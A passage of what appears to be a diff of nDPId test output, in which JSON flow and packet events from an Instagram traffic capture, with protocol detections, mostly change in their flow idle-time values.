PQmi2l+V2tphQpp2jEsWxETCl2LSUnlcR9XDLGnBO3KYnN9C0+k2yBKCMObHAcOzwdJWheAOhMNBVSNpFtrfOE6uSTsVbDj23xeCxxC1QAM7YJmxoVRhtdVyIDYYANmHTFeA\/uC6oLDeExrKyQP7kSEfNbdUqTNPu\/MJKIjJDZu1yLmyvi1O\/nGho5EDKw8IVXPxnfKKPvaQH2GtI88pEfGeAEyC\/HE\/tmFwWll7dh2qPp5A3wF8sKJ3O0eDAbcGfPED7oJA+EsxJAhKT6isvErCueBtWMHVSeiLsoME8tf6cS9zzgnk33LczZTQgm29MSHE7ZL2GeiGbzuGwrTGDnk1VDLJRove2wMug8H7\/TzDu7ltmYb22OyZHWPR+qBc0SXnC41HvKpdG4l5lloyRu51PXhn1Z4SBmRKxgHOd10WPpGH9Et\/GeMS7LFYrc7oqcb6G7UCvo5VgI1SuJrJeY0vV2tCM0MyJYykeRmE4\/7F1xpcmuoE1e5ET3+6eiLGpqXUS7VkABwgQafZxjQScCWI5pekzUYOfjX5epPROl\/DzQKTCdpj3Gvhf2XBY54ImjWPLE32kUQllKDfXNIYtYFjXJbjsc4Zka4\/X4kGWgbCWN+dmnakKME8cbt\/+4rEk8PQFIv1W4FPcpki7hccXc0xhFEqm0Sw=="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1436720908259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908259,"pkt":"QPMIw47hABsv8H60CABFAAA0u1VAAFUGLR4fDV00wKgAZwG7hI+o7MT1gUCDQoAQAFyKzgAAAQEIClsYbBQAA+5i"} +02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1436720908432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908432,"pkt":"QPMIw47hABsv8H60CABFAAWqu1ZAAFUGJ6cfDV00wKgAZwG7hI+o7MT1gUCDQoAQAFzmhwAAAQEIClsYbL0AA+5iFwMBBgCkPdU4R6wGSIS3keHeixTLTI9zV+il0PpZ8q91YamIsd4IZ1iA9S2D6W\/nJ4T6403w2+fJe+hdEKNsk0963CdXOEXDNkQKpXOBBE+0Y\/4Fle8ueshRyGFFEoc6PtZpKpwayy+TKxEJ4pFJyX2oGMWjaZzaOyD59AskeV\/YOll+Xm0S27uMjZKkLBkCxDNPTNhB8fh\/syM9nxdE4huEu1SgtsgSRap7+5OfSJa0vJji4Lac5HIGGpVuCAdsaWkkirxUeGhBT5KqUaH3z34YK2q9OCFDjG6zQx+K5wB6\/1tRpCV4T0Wdq9iazWqTK9fhu3Q8m7M+n+OlMsKGxDIEQhTmUFv6EsILdWY4XaXzsNt68ilI12u8FIErHj5xADP5BSss+D\/PqbyyYfj1siM7kMLTpiPXuCUljd29w+P7wtJOUzlqcHwFv60jtkmE5R7DR9LN47rlhx2ZgEX8b9nsvGl\/Z1KSCJ1m3XV6f0806axX94l9imfNEVAHweCX3kOlfFNWODbpNzNbLbpVtPn7xKRA5Y140DajcNQvyREJ7DrHWIxbEPKUq+SIMaNEJqDkl0rYnPqvJYuixcmcTK6joyocw7sF+MmuWuJzAwYoGvQacoqaNqOp0iEPlyz8x6cTF7HbzVKHlLYHsfsKMGz98miVsnjvci5f7S+qZN8wJt+ycMpErrmm5SYVwnyDiARUnY01FjBiu7oXosmSU8r8tl1Y7oQcefwWQmUMJwEVoICnXk5o\/1P1fTAJawMxQor10OxDf\/BV8+4BnkZNbktKhC4u6rpy4t9mTFTFoJnekuOgtsyuYF1D1pTovQynkNog8sbNDLg6lOVy2sSjtN38M5BrjfWP6NvWf5rAbsDm9Qvw2VUkrLm+vXfuLJeKqhTOHspJB2ZVScw6fgqCCRgXV4hbT47jXkZHPFeUj3xtv5oznldP1XEp\/Y0YyZnWCMaWATZlGVUiSYeiFbrcd70L0WujcTQSesgJzHbOqeptYMiDDVIYXi5utFDZis9FPZA2ul\/lArmvEL\/urLFDKdnXMnNjyIIqJtwWZlcpDAHOfD2KyMM51NtnpD3NXBz6ngCZNoi3DrWeJbaK2NX4FFrr9nkmfuHb0MCV8zapTpFVeDqmiCnEMr1A22q06nZsJij0BS+jpAlud6+DjOPKWljFzy06Xn15YGW3Dm07Vi1rGNQXnlLIYZbH\/Lf9VbK8rn+tf2U4X+kmR\/seSiHTIiCrfQRY82NcG+s2JE\/3RNuUUsdP3+A8UZATxsKmMNb9p9jduLcV5NSz3qcz\/E+TORnhzC5qM5iDlSbThKZAPEgvS54QGz00rdEYWdvIwL1jLd2l2yP9aEoOWrH+sNsRBCU97PG1IRhRS5jctVYyDntPEBlAbqGj6sdT5C6POfN9JdpaIsZmGaMmnU0z4bjokazZ5F6F501SFGcsFKmgoCdZLCQyyA\/CkkbqEF1LeEPM1KkE88DAsVjRhjRCz9D6VKRt8PZdtywXXp7E7yF8+4SN\/2h5CqHv4N+v+ejLyvCd2t1L4BFuJ7BTwaB6NicxBq3cWSEeADsWxC4xODPl+fmk90gThIrGh3\/E3G\/K8LjJkXPwBqDPoSCAh\/lyvY4cI9USKSjdTboTHfChgT73IzMJk4MESnvGhexHkwWw4ndKaJ88XZfXiGJCI\/GHCwJX7Zu\/IG7bV7st4TnImk\/Ds\/xEG7y3JgmTAc9wIRPfDmTaMW0XI0vpt5j1BnCLq+es4TBuh9vggrd8U5G3S+2hj2u1HQPo3wjRAM4dNo6in8nnmD4n\/\/G9yrHWQwizkMQMUhZbY0jDslavyFSGnWc0JVIhfEzkCZm+lGdYxoDPUYKjjFRFeJ8o"} 00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1436720908464,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908464,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRcAAEABOq\/AqABnwKgAZwMDE08AAAAARQAAPFm5QABABkodwKgAZ63CKBTA+AG7+Mu3wgAAAACgAjkIlxQAAAIEBbQEAggKAAPuewAAAAABAwMG"} 00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.471674} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1436720908464,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908464,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRcAAEABOq\/AqABnwKgAZwMDE08AAAAARQAAPFm5QABABkodwKgAZ63CKBTA+AG7+Mu3wgAAAACgAjkIlxQAAAIEBbQEAggKAAPuewAAAAABAwMG"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908466,"flow_last_seen":1436720908466,"flow_idle_time":7440000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908466,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1436720908466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908466,"pkt":"ABsv8H60QPMIw47hCABFAAPpXL5AAEAGnQDAqABnHw1dNIPjAbuhtt+gEOOOT4AYCqMt2AAAAQEICgAD7nvwIEj8FwMBA7DXpbZuuL+a3+A25sPf3KC8vtrovZX7fcip20iH4gbDYKHRurDuUNBuKdxbaf8w5NnTQml9NHFuaiFV9xaPTEtRbbFB9QgL8vlHsxgX1jfO9ZT6YB1lbKI1n65g8AZltFoEnCsmCE1IOxVyjBVZQT7po2puEnrF+kDYe4098KgZgFIZStFzMtmo9XOmOfNP+iRYctfjIeGJz8jQ1lFBvHEsbbQIygOCYn9oDm7CXWwj2LvemnGFKWnWYwKY2HgH6zrHi9xUd7CDCihcewk3nTPbbyiC\/Oifk2F1KjvO+B1lmqoGqUOYx21p5F3Yy7giHbLKSW+ti05sAV0fAKz7Z8+aVWuucvLaUbW+dSKFEZubeujNKIbXr7vCkpaZCatjRYZUgGNtsk2NBSXDlVMA\/v3I+TpoH8L5Ft2TQGs+aL8gJ2KVF6O2+ZYxZ96KcyiQmukk5fWpPjyBq7B0lhl8\/l+87aNWAB+03OvN8FhYV+S\/gv75JF3N388CBkyP4ME8FRt4W55y8LCj1tqiL9fodHUaE6F0ridmX8h0+Dsd82vVVQdbomtwYWVDLtEOA4gG2jJjDPllVf5J8xmFGHsA6M\/TDTHEfu8LTRQc1d6jnJGUH9Eeq7GjZHoFXfcfkpY9BGbqJWKidAdwRrWxc1XI2wcOmTiqvy3W0kHXHGHBqtUOPHt80fdZz3Php0HqhVjapNrBUUzl1zXCtqo+\/D90yVXLpIbqbzqp1UOs3uY9nrVZKeWZAphdT0b38N153F9QCQaE1j\/B3yRInHVxnxDr8\/wXaBQutJGt+fT8YapiNjDh2B5Fe\/VzJjaUK9\/s\/F4+YAkFfcLJJgpkyZ1FyjpKFDmEKLJS\/hWon3VkTkSPBJyUnbR06ETQWOqnwWcQKPcsS14LaHbhuVhKdt2tBBxQtcd0OoPW2aLOEDh9uAs1wndQ8cDwLHeWOSYDiwyq7hmF978JHTDY5T9UPy1BfhkIGr1397oeYW8tQLiHwwHKS6l11zZwAq8rb2bsBNkrNvLFUBdxAJWO7YtLy1slqNoFAyDdp7eKwmaP317WVsHGvyiwNdASVNzu1pbccCR6AgqCnTrbOntDjyNK4u2jrQuFCeBAMKVe19ptimavwWdWcfiYh6zgKaavEskV4nXhC01pvDJfX\/uuk2wAy46ocrpdos3RqXm7EpLF72d506O+IxXSSlwIplmFgawKqTtoIASL2SkYHX0Y3wKxf+vCHqdiD1nEkmvwUYQ8dkrjuTHBA1bDvg=="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1436720908518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908518,"pkt":"QPMIw47hABsv8H60CABFAAA0kN9AAFUGV5QfDV00wKgAZwG7g+MQ445PobbjVYAQANn+UgAAAQEICvAgscMAA+57"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908521,"flow_last_seen":1436720908521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908521,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1436720908521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908521,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y1AAEAGBcbAqABnLiFGoJehAFBl4Bu99+Pb34ARFTc19wAAAQEICgAD7oGa3vT1"} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908466,"flow_last_seen":1436720908466,"flow_idle_time":7560000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908466,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1436720908466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908466,"pkt":"ABsv8H60QPMIw47hCABFAAPpXL5AAEAGnQDAqABnHw1dNIPjAbuhtt+gEOOOT4AYCqMt2AAAAQEICgAD7nvwIEj8FwMBA7DXpbZuuL+a3+A25sPf3KC8vtrovZX7fcip20iH4gbDYKHRurDuUNBuKdxbaf8w5NnTQml9NHFuaiFV9xaPTEtRbbFB9QgL8vlHsxgX1jfO9ZT6YB1lbKI1n65g8AZltFoEnCsmCE1IOxVyjBVZQT7po2puEnrF+kDYe4098KgZgFIZStFzMtmo9XOmOfNP+iRYctfjIeGJz8jQ1lFBvHEsbbQIygOCYn9oDm7CXWwj2LvemnGFKWnWYwKY2HgH6zrHi9xUd7CDCihcewk3nTPbbyiC\/Oifk2F1KjvO+B1lmqoGqUOYx21p5F3Yy7giHbLKSW+ti05sAV0fAKz7Z8+aVWuucvLaUbW+dSKFEZubeujNKIbXr7vCkpaZCatjRYZUgGNtsk2NBSXDlVMA\/v3I+TpoH8L5Ft2TQGs+aL8gJ2KVF6O2+ZYxZ96KcyiQmukk5fWpPjyBq7B0lhl8\/l+87aNWAB+03OvN8FhYV+S\/gv75JF3N388CBkyP4ME8FRt4W55y8LCj1tqiL9fodHUaE6F0ridmX8h0+Dsd82vVVQdbomtwYWVDLtEOA4gG2jJjDPllVf5J8xmFGHsA6M\/TDTHEfu8LTRQc1d6jnJGUH9Eeq7GjZHoFXfcfkpY9BGbqJWKidAdwRrWxc1XI2wcOmTiqvy3W0kHXHGHBqtUOPHt80fdZz3Php0HqhVjapNrBUUzl1zXCtqo+\/D90yVXLpIbqbzqp1UOs3uY9nrVZKeWZAphdT0b38N153F9QCQaE1j\/B3yRInHVxnxDr8\/wXaBQutJGt+fT8YapiNjDh2B5Fe\/VzJjaUK9\/s\/F4+YAkFfcLJJgpkyZ1FyjpKFDmEKLJS\/hWon3VkTkSPBJyUnbR06ETQWOqnwWcQKPcsS14LaHbhuVhKdt2tBBxQtcd0OoPW2aLOEDh9uAs1wndQ8cDwLHeWOSYDiwyq7hmF978JHTDY5T9UPy1BfhkIGr1397oeYW8tQLiHwwHKS6l11zZwAq8rb2bsBNkrNvLFUBdxAJWO7YtLy1slqNoFAyDdp7eKwmaP317WVsHGvyiwNdASVNzu1pbccCR6AgqCnTrbOntDjyNK4u2jrQuFCeBAMKVe19ptimavwWdWcfiYh6zgKaavEskV4nXhC01pvDJfX\/uuk2wAy46ocrpdos3RqXm7EpLF72d506O+IxXSSlwIplmFgawKqTtoIASL2SkYHX0Y3wKxf+vCHqdiD1nEkmvwUYQ8dkrjuTHBA1bDvg=="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1436720908518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908518,"pkt":"QPMIw47hABsv8H60CABFAAA0kN9AAFUGV5QfDV00wKgAZwG7g+MQ445PobbjVYAQANn+UgAAAQEICvAgscMAA+57"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908521,"flow_last_seen":1436720908521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908521,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1436720908521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908521,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y1AAEAGBcbAqABnLiFGoJehAFBl4Bu99+Pb34ARFTc19wAAAQEICgAD7oGa3vT1"} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1436720908523,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908523,"pkt":"ABsv8H60QPMIw47hCABFAABL7oFAAEARewHAqABnCAgICMgTADUANxLxN7ABAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1oLWEIYWthbWFpaGQDbmV0AAABAAE="} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1436720908524,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908524,"pkt":"ABsv8H60QPMIw47hCABFAABL7oFAAEARewHAqABnCAgICINDADUANycOb2MBAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1hLWEIYWthbWFpaGQDbmV0AAABAAE="} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908531,"flow_last_seen":1436720908531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908531,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1436720908531,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908531,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKZAAEAG2ADAqABnUlUaueJuAFA8SfXPvvA\/t4ARCm0uRAAAAQEICgAD7oJZ6tXr"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908531,"flow_last_seen":1436720908531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908531,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1436720908531,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908531,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKZAAEAG2ADAqABnUlUaueJuAFA8SfXPvvA\/t4ARCm0uRAAAAQEICgAD7oJZ6tXr"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 